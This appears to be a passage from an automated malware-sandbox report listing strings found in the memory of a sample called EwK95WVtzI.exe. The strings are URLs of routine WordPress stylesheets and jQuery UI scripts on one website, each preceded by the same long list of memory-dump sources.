                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=c08792de11d2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
